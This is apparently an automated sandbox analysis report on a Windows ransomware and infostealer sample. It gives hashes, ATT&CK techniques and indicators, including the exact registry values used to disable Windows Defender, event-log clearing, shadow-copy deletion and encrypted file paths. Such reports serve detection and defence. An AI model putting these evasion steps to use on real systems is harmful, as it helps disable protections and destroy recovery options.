af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Analysis

max time kernel
76s
max time network
70s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
25-05-2023 17:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Size

884KB
MD5

da13022097518d123a91a3958be326da
SHA1

24a71ab462594d5a159bbf176588af951aba1381
SHA256

25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
SHA512

a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
SSDEEP

12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw

Score

10^/10

evasion ransomware spyware stealer trojan upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command-Line Interface

T1059

pid	Process
2188	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
2776	wevtutil.exe
1516	wevtutil.exe
3592	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral7/memory/2288-121-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-122-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-123-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-124-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-126-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-141-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-541-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-1401-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx
behavioral7/memory/2288-2245-0x00000000013B0000-0x00000000016C2000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyDrop32x32.gif.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzz5ZHH4unfKe1-hUolO2tVh.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzx3GgheumV6LjgvWJQemOpY.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyxQO9m-Q-NB-0zuoHIAaZj.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\jaccess.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzy0R8Z1ynOhYhIV0P8gzkAO.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\fr-FR\msaddsr.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\charsets.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxdxq3Mw3hiREMjClaNr3UZ.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyVqiRsN2BzKdUHN9_ovT0_.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzw3ceesPDEfLIUvYDIcluxG.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwYQzd8nhDoOc1OBc0HqRcM.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyfO4zWoKWtazRfGo6NRzEi.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzzne0O7sTX_ElCESt9t170z.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\packager.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxY6rV0A8jIEEPA09G4ASQe.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwVppIGSueRNIyyW20OHjlq.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzw3b-gN1NQKDlCY8Lt8-kog.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwqVqH99F6-RZMaHXs5jsFD.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyxJ7r2ajvsTSWs1DO7Dagk.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzycEeZyEkaxVkDtIzAY9ysi.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\NOTICE.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxuVCuzdTLwDoCCcfy-x1YF.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxdLVFITQKDV3k0l0_dt9FP.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwL912Rk8SJawInz2RAyN52.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzykoowWM_wVTw46DVa73kNY.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzz3BI7v5NJxcE7h6opY3LR2.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxD8ZZ6YqpuXNb0YHDmEM06.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzz-Bc9wC3vnWekQGewSf7Bz.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxFKPCapi0jaK8Tk1ZMvYcB.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxsNeugKWMZSzJHeGlmeHdb.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxHV4b6t3RVPcHpnrpzX1Au.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzy48qzDqdgZZ119nXzq2JN7.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxMvJP2x_sGUg1zr6pKZNBW.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzy-mX42KkO1NIHq2Em6iFo0.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwnrXrZ8vvfJMvRM7-vNLBd.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipscsy.xml	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzzfEq-H_1n7Ro1xOskAjYsD.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ul-oob.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyow0FSA75vdOh_jr8yKCoB.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzygp7WlKNxdfGbf7Plvjzdq.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwlFZYdkTIifZRD5qJWB8hT.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-pl.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwcs1O2WNf3KSUhp1d_SAZ4.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyg1-QX7BKLaJXwmmVNULdD.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyh6uhwMkEya_vCR7a0iGRa.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzy4RuaGnDW1ZwBqG-l1qWJ9.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzzb7DC0Cp3TMt9oqjktceEi.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwD5EvuYW68Y9k_wutkDk1x.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwvOshdEVj6UxiBMYSgX_RL.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxdaW2RYgzHFpfdNFBMD4JS.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\de-DE\mip.exe.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxwMCaQ7q9bTVx9Ar_IzfsJ.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyBRlAOeAKdCetKOvo5ol1I.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzzcuZIsqwYXN9K5jIFHqsZH.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyp5nKNbcCjQNlQ0Z4d0XRl.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzx2IB6xb9S3V81qrmlgz9Iv.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxt956zqWXdNY2g-YmFR5hF.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzz9Ltffbi3GHAuqLAYjTm1o.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzx_A0wPcR5AVZn3PrdTp3M7.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxTUOIjBf3-d2PTW42xlIE4.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzwGN8K7V9_5QY6MSeq9-oVF.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ppd.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzyltQRvGpYFQm0x1PH_YWtv.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_KMS_Client-ul.xrm-ms.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxHdFcF9doTS9cDRFG4o64J.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\correct.avi	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzz8bthFJWp0LR36PexX2vEJ.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.qEdI8upq7JDy_al_HyNzKzfpWE2mBE3MG87Vn-dETzxhpFBJhshaRaBd0Tppn3U7.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4816	sc.exe
4604	sc.exe
4796	sc.exe
4984	sc.exe
4836	sc.exe
760	sc.exe
4524	sc.exe
4540	sc.exe
3396	sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4936	vssadmin.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4520	powershell.exe
4520	powershell.exe
4520	powershell.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	2776	wevtutil.exe
Token: SeBackupPrivilege	2776	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	3592	wevtutil.exe
Token: SeBackupPrivilege	3592	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	3904	wmic.exe
Token: SeSecurityPrivilege	3904	wmic.exe
Token: SeTakeOwnershipPrivilege	3904	wmic.exe
Token: SeLoadDriverPrivilege	3904	wmic.exe
Token: SeSystemProfilePrivilege	3904	wmic.exe
Token: SeSystemtimePrivilege	3904	wmic.exe
Token: SeProfSingleProcessPrivilege	3904	wmic.exe
Token: SeIncBasePriorityPrivilege	3904	wmic.exe
Token: SeCreatePagefilePrivilege	3904	wmic.exe
Token: SeBackupPrivilege	3904	wmic.exe
Token: SeRestorePrivilege	3904	wmic.exe
Token: SeShutdownPrivilege	3904	wmic.exe
Token: SeDebugPrivilege	3904	wmic.exe
Token: SeSystemEnvironmentPrivilege	3904	wmic.exe
Token: SeRemoteShutdownPrivilege	3904	wmic.exe
Token: SeUndockPrivilege	3904	wmic.exe
Token: SeManageVolumePrivilege	3904	wmic.exe
Token: 33	3904	wmic.exe
Token: 34	3904	wmic.exe
Token: 35	3904	wmic.exe
Token: 36	3904	wmic.exe
Token: SeIncreaseQuotaPrivilege	4664	wmic.exe
Token: SeSecurityPrivilege	4664	wmic.exe
Token: SeTakeOwnershipPrivilege	4664	wmic.exe
Token: SeLoadDriverPrivilege	4664	wmic.exe
Token: SeSystemProfilePrivilege	4664	wmic.exe
Token: SeSystemtimePrivilege	4664	wmic.exe
Token: SeProfSingleProcessPrivilege	4664	wmic.exe
Token: SeIncBasePriorityPrivilege	4664	wmic.exe
Token: SeCreatePagefilePrivilege	4664	wmic.exe
Token: SeBackupPrivilege	4664	wmic.exe
Token: SeRestorePrivilege	4664	wmic.exe
Token: SeShutdownPrivilege	4664	wmic.exe
Token: SeDebugPrivilege	4664	wmic.exe
